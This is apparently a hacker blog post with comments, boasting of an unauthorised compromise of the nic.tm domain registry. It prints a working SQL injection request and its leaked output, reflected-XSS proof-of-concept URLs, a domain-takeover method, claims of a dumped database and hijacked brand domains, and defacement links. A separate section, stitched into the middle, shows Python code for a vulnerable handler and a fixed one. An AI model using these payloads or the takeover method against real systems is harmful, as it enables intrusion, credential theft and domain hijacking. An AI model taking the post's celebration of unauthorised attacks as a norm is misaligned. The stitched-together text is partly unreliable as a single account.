As an independent project we decided to penetrate some important sites, and today we want to share a small part of what we have done. Today we proudly announce nic.tm here: it runs a vulnerable application that is prone to a MySQL injection bug, and that bug was a big lead that gave us the credentials of all the sites. In the rest of this update we describe the vulnerability that affected the site.
If you glance at the picture below:

It can be understood that the hidden parameters might not be checked; this was the hole we focused on:
POST /cgi-bin/mail_my_domains HTTP/1.1
Host: nic.tm
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Connection: Close

Addr=1029999%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28system_user%28%29+as+char%29%29%29%2C0x27%2C0x7e%29--+a&OrderBy=1
And we received:
.................. .................. ..................The database search found 0 ~'drs@localhost'~ domains
Oops, we saw the data leakage from Nic.tm's database: drs@localhost is the current database user. For data gathering we automated the attack and dumped the whole database. Another considerable point was the passwords: they had been saved in clear text, which is an unacceptable issue for the NIC of a country. All dumped data are accessible through this link. We also found some important domains among the dumped data (listed below), which we were able to hijack easily:
www.youtube.tm
www.gmail.tm
www.msdn.tm
www.intel.tm
www.officexp.tm
www.xbox.tm
www.windowsvista.tm
www.orkut.tm
www.google.tm (?)
www.yahoo.tm
www.cisco.tm
This was not the end of the story: we realized that the application also suffers from reflected cross-site scripting. The affected parameters were Addr and OrderBy. PoCs:
/cgi-bin/mail_my_domains?Addr=1%27+union+all+select+1%E2%80%9C+a&OrderBy=1847ae%27%3E%3Cscript%3Ealert%281%29%3C/script%3E
/cgi-bin/mail_my_domains?Addr=1%27+union+all+select+1--+ad4a26%3E%3Cscript%3Ealert%281%29%3C/script%3E&OrderBy=1
They both work correctly in Firefox. Finally, here is the Gmail.tm panel after authentication:

We can also point to another security flaw: in the panel, when you change the DNS of a domain, a confirmation e-mail is sent to the handler's e-mail address, which can be changed to the attacker's address. The following domains were defaced as PoC:
http://zone-h.org/mirror/id/19125537
http://zone-h.org/mirror/id/19125766
http://append-hc.com/mirror/id/66204
http://zone-h.org/mirror/id/19126130
http://zone-h.org/mirror/id/19126154
http://zone-h.org/mirror/id/19125901
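Before the sign-off, an added example that is not part of the original post and not nic.tm's code: a small Python stand-in for the mail_my_domains handler, shown in its broken form (Addr and OrderBy pasted into the SQL text, the search value echoed raw into the page) next to a fixed form (bound parameter for Addr, an allowlist for the ORDER BY column since a column name cannot be bound, HTML escaping at output). The table, the rows, the handler ids and the ALLOWED_ORDER mapping are constructed for the demo; SQLite replaces MySQL, so the fixed version is what matters and the broken one only shows that an injected UNION reaches the database.

```python
import html
import re
import sqlite3
from urllib.parse import parse_qs


def build_db():
    # Constructed in-memory table standing in for the registry's domain list.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE domains (id INTEGER PRIMARY KEY, name TEXT, handler_id INTEGER)"
    )
    conn.executemany(
        "INSERT INTO domains(name, handler_id) VALUES (?, ?)",
        [("example.tm", 1029999), ("second.tm", 1029999), ("other.tm", 42)],
    )
    return conn


# Hypothetical mapping from the OrderBy form value to a real column name.
ALLOWED_ORDER = {"1": "name", "2": "id"}


def vulnerable_search(conn, addr, order_by):
    # Both parameters land verbatim in the SQL text, exactly the pattern
    # that lets a UNION in Addr add attacker-chosen rows to the result.
    sql = "SELECT name FROM domains WHERE handler_id = '%s' ORDER BY %s" % (
        addr,
        order_by,
    )
    return [row[0] for row in conn.execute(sql)]


def safe_search(conn, addr, order_by):
    # Handler id: validated as a number and passed as a bound parameter.
    if not re.fullmatch(r"\d{1,10}", addr):
        raise ValueError("Addr must be a numeric handler id")
    # ORDER BY target: not bindable, so it comes from an allowlist only.
    column = ALLOWED_ORDER.get(order_by)
    if column is None:
        raise ValueError("unsupported OrderBy value")
    sql = "SELECT name FROM domains WHERE handler_id = ? ORDER BY " + column
    return [row[0] for row in conn.execute(sql, (int(addr),))]


def render_result(addr, names):
    # Escaping the echoed value at output time closes the reflected XSS.
    return "The database search found %d ~%s~ domains" % (
        len(names),
        html.escape(addr, quote=True),
    )


def handle_request(body):
    # Parse the urlencoded POST body the way the CGI would see it.
    params = parse_qs(body, keep_blank_values=True)
    addr = params.get("Addr", [""])[0]
    order_by = params.get("OrderBy", [""])[0]
    conn = build_db()
    try:
        names = safe_search(conn, addr, order_by)
    except ValueError as exc:
        # The error text never contains the raw input, so nothing is reflected.
        return "Bad request: " + str(exc)
    return render_result(addr, names)


if __name__ == "__main__":
    print(handle_request("Addr=1029999&OrderBy=1"))
    print(handle_request("Addr=1%27+union+all+select+1--+a&OrderBy=1"))
```

The broken variant is kept only so the contrast is testable: the same `1' union all select 1-- a` value that `vulnerable_search` happily executes is rejected by `safe_search` before any SQL is built, and an OrderBy value outside the allowlist is rejected the same way, which is the only sound option for a column name.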
Have a nice hacking, be safe.
lol, I am sorry for nic.tm
Thanks for sharing.
Well done.
https://www.nic.tm//cgi-bin/mail_my_domains?Addr=1%27+union+all+select+1–+ad4a26%3E%3Cscript%3Ealert%281%29%3C/script%3E&OrderBy=1
there is nothing
I hope you can explain to me how or where to access "remember Me".
It's been fixed, Sola :)
Awesome and simple hack! Thanks for sharing!!
Thanks for the comment.
Yashar, well done.
I had a question.
There is someone who keeps hacking Joomla sites, going by the name
gh()st
And this is his site, bro: sec-w.com
This is my e-mail; can you tell me what to do about this Arab …?
alavinik.nao@gmail.com
He most likely has a bug in one of the Joomla components.
If you got hacked, write me the list of your extensions.
Simple Hack
Nice
Thanks : D
Gr8 Job
Nice Job